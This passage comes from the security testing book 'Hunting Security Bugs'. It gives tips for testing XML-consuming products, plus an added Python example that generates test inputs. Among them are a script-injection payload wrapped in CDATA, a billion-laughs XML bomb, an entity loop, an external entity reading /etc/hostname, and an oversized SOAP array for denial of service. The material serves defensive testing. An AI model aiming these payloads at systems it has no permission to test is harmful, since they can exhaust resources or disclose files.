Testing Tips

Use the following tips when you are testing products that use XML:

  • When you test an application that consumes XML input, do not limit testing to XML-specific cases. Most attacks that have nothing to do with XML (HTML script injection, spoofing, buffer overflows, information disclosure, and so on) can be delivered just as well inside an XML document; the XML is only the envelope.

  • Use CDATA sections and character references to include arbitrary characters (markup delimiters, quotes, control characters) as part of the XML while still producing well-formed and valid XML. This lets the payload reach the application instead of being rejected by the parser.

  • When creating XML input, use an editor that gives you complete control over every byte of the data. An XML-specific editor might refuse to create certain fields or might silently change the data when saving it. A basic text or hex editor is ideal for XML files; for SOAP messages, use a Web proxy so you can modify the request after the client has built it.

  • Don't forget the XML- and SOAP-specific tests, including infinite entity reference loops, XML bombs, overly complex XML, external entities, XML injection, large file references, and SOAP array denial of service.
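The following is an added example, not code from the book: it builds the kinds of test inputs the second and fourth tips describe (CDATA and character-reference wrapping of an arbitrary payload, an entity reference loop, an XML bomb with its expansion size, an external entity reference, and a SOAP array with an oversized declared length) and checks the first two against Python's stock expat-based parser. The element names, entity names, the `file:///etc/hostname` URI and the array size are assumptions chosen for illustration.

```python
"""Generators for XML test inputs (added example, not the book's code)."""
import xml.etree.ElementTree as ET


def cdata_wrap(payload: str) -> str:
    """Wrap arbitrary text in a CDATA section.  The only sequence that cannot
    appear inside CDATA is its terminator ']]>', so split it across two
    sections: ']]' closes the first, '>' opens the second."""
    return "<![CDATA[" + payload.replace("]]>", "]]]]><![CDATA[>") + "]]>"


def charref_wrap(payload: str) -> str:
    """Encode every character as a hexadecimal character reference, so that
    <, &, quotes and control characters survive without needing CDATA."""
    return "".join(f"&#x{ord(c):x};" for c in payload)


def roundtrip(wrapped: str) -> str:
    """Parse <t>...</t> and return the decoded text: proves the document is
    well-formed and that the payload reached the application unchanged."""
    return ET.fromstring(f"<t>{wrapped}</t>").text or ""


def parsed_text(doc: str) -> str:
    """Parse a complete document and return the root element's text."""
    return ET.fromstring(doc).text or ""


def parser_rejects(doc: str) -> bool:
    """True if the stock parser refuses the document with a parse error."""
    try:
        ET.fromstring(doc)
    except ET.ParseError:
        return True
    return False


def entity_loop() -> str:
    """Two internal entities that reference each other.  XML forbids recursive
    entity references, so a correct parser must reject this rather than spin."""
    return '<!DOCTYPE t [<!ENTITY a "&b;"><!ENTITY b "&a;">]><t>&a;</t>'


def xml_bomb(depth: int = 10, fanout: int = 10, leaf: str = "lol") -> tuple[str, int]:
    """'Billion laughs' bomb: each level references the level below `fanout`
    times.  Returns the (small) document and the length of its fully expanded
    text, i.e. what a parser without expansion limits would try to allocate."""
    decls = [f'<!ENTITY e0 "{leaf}">']
    for i in range(1, depth + 1):
        refs = f"&e{i - 1};" * fanout
        decls.append(f'<!ENTITY e{i} "{refs}">')
    doc = f"<!DOCTYPE t [{''.join(decls)}]><t>&e{depth};</t>"
    return doc, len(leaf) * fanout ** depth


def external_entity(uri: str = "file:///etc/hostname") -> str:
    """Reference an external resource through an entity (assumed URI).  Whether
    the target fetches it and echoes the content back is what is under test."""
    return f'<!DOCTYPE t [<!ENTITY x SYSTEM "{uri}">]><t>&x;</t>'


def soap_array(declared: int = 2_000_000_000) -> str:
    """SOAP 1.1 encoded array whose declared size is huge but which carries one
    element.  An endpoint that pre-allocates on the declared size is the target."""
    return (
        '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"'
        ' xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"'
        ' xmlns:xsd="http://www.w3.org/2001/XMLSchema">'
        "<SOAP-ENV:Body><items SOAP-ENC:arrayType="
        f'"xsd:string[{declared}]"><item>x</item></items>'
        "</SOAP-ENV:Body></SOAP-ENV:Envelope>"
    )


if __name__ == "__main__":
    print(roundtrip(cdata_wrap("<script>alert(1)</script>")))
    print(roundtrip(charref_wrap("a]]>b & \"c\"")))
    print("loop rejected:", parser_rejects(entity_loop()))
    doc, size = xml_bomb()
    print(f"bomb is {len(doc)} bytes, expands to {size} bytes")
```

The round-trip check matters: a payload that breaks well-formedness never reaches the application code you are trying to test, so it is the parser, not the product, that you end up exercising. The bomb is never parsed at full size here; compare its expansion size against whatever limit the product claims to enforce, and treat acceptance of the entity loop as a finding in its own right.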



Hunting Security Bugs
ISBN: 073562187X
Year: 2004
Pages: 156